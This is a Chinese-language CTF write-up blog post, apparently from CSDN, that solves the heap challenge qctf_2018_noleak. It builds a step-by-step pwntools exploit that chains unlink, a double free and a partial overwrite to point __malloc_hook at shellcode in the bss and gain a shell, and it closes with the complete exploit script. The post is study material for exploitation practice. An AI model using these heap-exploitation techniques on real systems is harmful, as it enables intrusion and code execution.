在不知道libc的情况下getshell&&qctf_2018_noleak

最新推荐文章于 2023-08-01 21:37:12 发布
最新推荐文章于 2023-08-01 21:37:12 发布
阅读量270 收藏 1
点赞数 1
分类专栏: linux_pwn 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123925521
版权

文章目录

这个题也真是开了眼了,完全就不知道libc,但最后也是打出来了

qctf_2018_noleak

qctf_2018_noleak

题目分析

delete

没有清空
在这里插入图片描述

edit

随便堆溢出
在这里插入图片描述

checkSec

在这里插入图片描述
这里的bss也就是保存ptr的地方是可以执行的
在这里插入图片描述

攻击思路

这个题目首先是无法修改fini,init,got表,所以我们不能直接劫持控制流
那只能通过malloc_hook
这个题目是无法泄露libc的,那么我们只能通过某些方式来修改__malloc_hook
首先可以考虑unlink,因为这里不是pie,所以ptr地址固定,那么很容易unlink,就可以实现我们随意控制指针写入

ptr = 0x601040
add(0x28, b"a")
add(0x418, b"a")
add(0x18, b"a") #防止重叠
edit(
    0,
    p64(0) + p64(0x21) + p64(ptr - 0x18) + p64(ptr - 0x10) + p64(0x20) + p64(0x420),
)
free(1)

在这里插入图片描述
通过edit0可以修改堆地址,达到任意地址写

考虑怎么把堆地址尽量靠近malloc_hook

最开始我考虑的是用double free,然后改成got表,最后就可以分配到got表里的值,然后就可以达到把函数地址写到bss里面,最后可以根据偏移来完成
但·后来发现这 libc函数地址和__malloc_hook不在一起
在这里插入图片描述
在这里插入图片描述
这明显需要爆破
那我们来看另一个main_arena的地址
在这里插入图片描述
我靠和malloc_hook只差0x10,那么我们考虑把main_arena地址写进去,这个刚好unsorted bin里面有地址

如何把main_arena地址写进去

由于我们unlink导致整体的结构出现了一些异常,我们要把中间重叠的size malloc出来
在这里插入图片描述

add(0x18)

在这里插入图片描述
因为free之后fd会被修改,所以我们要利用double free,把fd改成没有被free的包含main_arena addr的块

ptr = 0x601040
add(0x28, b"a")
add(0x418, b"a")
add(0x18, b"a")
edit(
    0,
    p64(0) + p64(0x21) + p64(ptr - 0x18) + p64(ptr - 0x10) + p64(0x20) + p64(0x420),
)
free(1)
add(0x18, b"a")#1
add(0x18, b"a")#2
free(3)
free(3)
edit(3, p8(0x90))#让我们1号块指向2号块,2号块里有地址

在这里插入图片描述
由于libc-2.27不会check count,直接再malloc3次

ptr = 0x601040
add(0x28, b"a")
add(0x418, b"a")
add(0x18, b"a")
edit(
    0,
    p64(0) + p64(0x21) + p64(ptr - 0x18) + p64(ptr - 0x10) + p64(0x20) + p64(0x420),
)
free(1)
add(0x18, b"a")
add(0x18, b"a")
free(3)
free(3)
edit(3, p8(0x90))
add(0x18, b"a")
add(0x18, b"a")
add(0x18, b"a")

在这里插入图片描述

修改为malloc_hook

malloc_hook最后两位为0x30
那么开始修改

ptr = 0x601040
add(0x28, b"a")
add(0x418, b"a")
add(0x18, b"a")
edit(
    0,
    p64(0) + p64(0x21) + p64(ptr - 0x18) + p64(ptr - 0x10) + p64(0x20) + p64(0x420),
)
free(1)
add(0x18, b"a")
add(0x18, b"a")
free(3)
free(3)
edit(3, p8(0x90))
add(0x18, b"a")
add(0x18, b"a")
add(0x18, b"a")
edit(0, p64(0) * 3 + p64(ptr) + p64(0) * 6 + p8(0x30))

在这里插入图片描述
在这里插入图片描述

修改malloc_hook为我们bss地址并填入shellcode

edit(7, p64(ptr))
edit(0, asm(shellcraft.sh()))

getshell

sa(b"choice :", b"1")
sa(b"Size: ", str(0x18).encode())
it()

allpayload

ptr = 0x601040
add(0x28, b"a")
add(0x418, b"a")
add(0x18, b"a")
edit(
    0,
    p64(0) + p64(0x21) + p64(ptr - 0x18) + p64(ptr - 0x10) + p64(0x20) + p64(0x420),
)
free(1)
add(0x18, b"a")
add(0x18, b"a")
free(3)
free(3)
edit(3, p8(0x90))
add(0x18, b"a")
add(0x18, b"a")
add(0x18, b"a")
edit(0, p64(0) * 3 + p64(ptr) + p64(0) * 6 + p8(0x30))
edit(7, p64(ptr))
edit(0, asm(shellcraft.sh()))
sa(b"choice :", b"1")
sa(b"Size: ", str(0x18).encode())
it()
debug()
it()
exit(0)

在这里插入图片描述

azraelxuemo
关注
专栏目录
攻防世界-PWN进阶区-Noleak(XCTF 4th-QCTF-2018)
weixin_44145820的博客
03-01 889
本题主要考察对堆的利用,需要有一定的背景知识,本文也参考了几篇大佬的Writeup,让本文尽可能详细。 题目分析 checksec: 本题的RELRO是完全开启的,意味着我们不能通过修改GOT表来进行攻击 以下是源代码: main函数 delete函数: 这里可以看到free之后没有把指针置空,可能有UAF或者Dubble Free edit函数: 在本函数中,没有检测大小就直接写入,明显...
Lab1&2_Environment_Variable
weixin_45680922的博客
12-06 2874
Task1: 使用 printenv 或env 命令打印环境变量。 (补充可打印特殊环境变量printenv PWD或 env | grep PWD) Printenv PWD, env |grep PWD 用export 或者 unset 去设置或者删除环境变量 Task2: 编译myprintenv.c, 运行且将结果保存到file,“a.out>file” 注释掉子进程里的 printenv()Line①,但不注释父...
[XCTF-pwn] 26_xctf-4th-QCTF-2018_noleak
weixin_52640415的博客
03-09 217
程序有add,edit,free没有show,pie未开,bss可写执行,有写溢出漏洞和UAF漏洞,unlink+fastbin attack,无需泄露地址。 解题思路: 先建0x28,0x80,0x10块,利用写溢出在释放1块时进行unlink控制指针区; 由于free时不清指针,且仅允许建9块,在控制指针区后清指针,保留控制指针的指针;并预留shellcode 建0x10,0x60,0x10在原unsort位置,释放0x60块后通过写溢出修改0x60的头为0x91再释放在0x60的fd位置得
XCTF 4th-QCTF-2018——Noleak分析
Eagle_hwei的博客
02-14 609
Noleak的题目分析 2020-02-1321:52:33 by hawkJW 题目附件、ida文件及wp链接   这道题考察的比较综合,设置到方方面面的知识点,这里记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,RELRO保护全开,则没有办法修改got表了,同时开启了Canary保护,栈溢出可能也有一定困难;但是我们看到,有NX没有开启,...
No leak XCTF 4th-QCTF-2018
qq_41071646的博客
07-25 672
这个题真的很好玩 先看一下保护 PIE 和 NX没开 那么我们可以 用shellcode 来写这一道题 先用ida 看一下题目 会发现 没有show 也就是输出函数 但是 dele 函数确实能够 安排很多东西 UAF 等等 而且我们发现 edit 可以自己定size 那么 就可以堆溢出 但是有一点就是 由于指针没有清0 如果我们不自己清0...
Double Free浅析
omnispace的博客
03-29 5520
最近在研究一些堆上面的漏洞。然后某一天骑自行车在路上跑的时候我突然悟出了Double Free的真谛。 2333好像太中二了一点,我是根据堆溢出的利用方法启发,再结合linuxlibc的源码。研究出了double free的利用方法。虽然有关double free的利用技巧已经不是一个秘密。不过好像很少有相关的中文的介绍,所以以一个初学者的角度来讲解一下double free漏洞的利用方法。 如
c语言 double free,写代码常见的两个安全问题
weixin_39977488的博客
05-19 830
写代码需要时刻考虑代码的安全性,昨天看了代码中容易出现的两个安全问题,在此记录一下。缓冲区溢出在C语言中,定义一个数组如:char str[100];,这里分配了100个字节的内存(缓冲区)供我们使用,当我们的代码中出现str[200]='1';时,这其实就是一个缓冲区溢出,我们修改了未分配给我们使用的内存中的内容。在C中是不检查数组下标越界的情况(当然如果程序非法修改了其他程序的内存,一般操作系...
libc++_shared.rar
07-13
博客资源文件,32位,存在于android\android-ndk-r12b\sources\cxx-stl\llvm-libc++\libs,博客https://blog.csdn.net/u013370255/article/details/107252777
avr-libc-user-manual-1.6.1.zip_avr libc user manu_it_libc.a
09-24
avr-libc 手册. It is a C library implementation for use with GNU GCC and GNU binutils for development of programs for Atmel s AVR microcontrollers.
avr-libc-user-manual-1.8.0.pdf.rar_The Up and Up_avr-libc
09-19
There is a wealth of information in this document which goes beyond simply describing the interfaces and routines provided by the ...available development tools: binutils, gcc avr-libc and many others
CTF-PWN-note-service2 (堆中shellcode执行)
SuperGate的博客
11-18 568
checksec Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments 发现没有开启NX,因此很有可能是要我们将sh...
【二进制安全】堆漏洞:Double Free原理
最新发布
Juruo@Security
08-01 1234
【二进制安全】Double Free原理
【学习笔记】CTF PWN选手的养成(三)
prettyX的博客
12-04 1288
atum大佬视频的总结 第三章 课时2 堆漏洞的利用技巧 0X01 基础知识 1、操作系统中的内存布局(Linux) 内核空间&用户空间,堆、栈等;cat /proc/pid/maps 要了解ELF文件结构 2、什么是堆? 数据结构:父节点总大于/小于子节点的特殊的完全二叉树 操作系统:程序在运行时动态申请和释放的内存空间(malloc,realloc,free,new,d...
Linux堆溢出漏洞利用之unlink
AliMobileSecurity的博客
06-06 4954
本文详细介绍了unlink攻击技术的核心原理,虽然上述介绍的unlink漏洞利用技术已经失效,但是还是有必要认真学习,因为它一方面可以进一步加深我们对glibc malloc的堆栈管理机制的理解,另一方面也为后续的各种堆溢出攻击技术提供思路。
Double free(hows2heap)
fanghuapyk的博客
04-23 1679
1.fastbin_dup fast bin fast bin主要是用来存放一些小的内存,使用fastbin可以提高小内存的分配效率,在默认情况下,对于SIZE_SZ为4B(32位)的平台,小于64B(字节)的chunk分配请求,和对于SIZE_SZ为8B(64位)的平台,小于128B的chunk分配请求首先会在fast bin中查找是否有所需大小的chunk存在,如果存在,就会直接返回内存资源,如果不存在,才会到其他bins中去查找。 fastbins 可以看成一个后进先出的栈,使用单链表来实现,通过 f
【逆向学习记录】Tcachebin CISCN_2019_PWN17 Write up
卦星的专栏
09-01 1001
1 概述 这几天做了一个libc2.27的题目,了解到tcachebin的基础内容,发现利用这个tcachebin,反而导致漏洞更好利用了 2 tchchebin 3 CTF题目 题目1:CISCN2019_pwn6 参考:pwn6_exp 题目2:CISCN2019_pwn17 4 解题思路 4.1 题目解析 1,输入内容,基本上没有任何内容提示 2、反编译查看 1、存在一个check,绕过这...
【软件与系统安全笔记】四、内存破坏漏洞
框架科工:Framecraft
09-12 2328
这是《【软件与系统安全】笔记与期末复习》系列中的一篇2022-03-21 第四次课后半部分内存破坏漏洞‍‍。
CTF二进制快速入门笔记01
kelxLZ的博客
11-30 1494
常见的二进制程序漏洞 栈溢出,堆溢出,UAF,这个UAF比较经常被问到 上述漏洞怎么利用 一、栈溢出 1.1 基础栈结构 进入函数时: CALLXXX PUSH retadddr(call的下一条指令,目的:知道怎么回来) JMP XXX 进入到XXX PUSH RBP(保存栈基址,好恢复) MOV RBP,RSP(栈底抬上去) SUB RSP,XXh(抬高栈顶给局部函数预留空间) 退出函数时: leave mov rsp,rbp(把rsp弄回来) pop rbp(把rb..
编写"优美"的SHELLCODE
jincm的专栏
12-31 2844
编写"优美"的SHELLCODE 作者:watercloud   主页:http://www.nsfocus.com 日期:2002-1-4     SHELLCODE的活力在于其功能,如果在能够完成功能的前提下又能比较"优美",那么就 更能体现shellcode的魅力. 个人认为shellcode的优美能在两个地方表现:     shellcode本身应该尽量的短小.
/usr/include/sys/cdefs.h:42:20: error: missing binary operator before token "(" 42 | # if __GNUC_PREREQ (4, 6) && !defined _LIBC | ^
05-27
这个错误是因为在程序中使用了一个宏定义 `__GNUC_PREREQ`,但是缺少了相应的头文件或者宏定义没有正确声明。`__GNUC_PREREQ` 宏定义用于判断 GCC 的版本是否符合要求,其定义如下: ```c #define __GNUC_PREREQ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值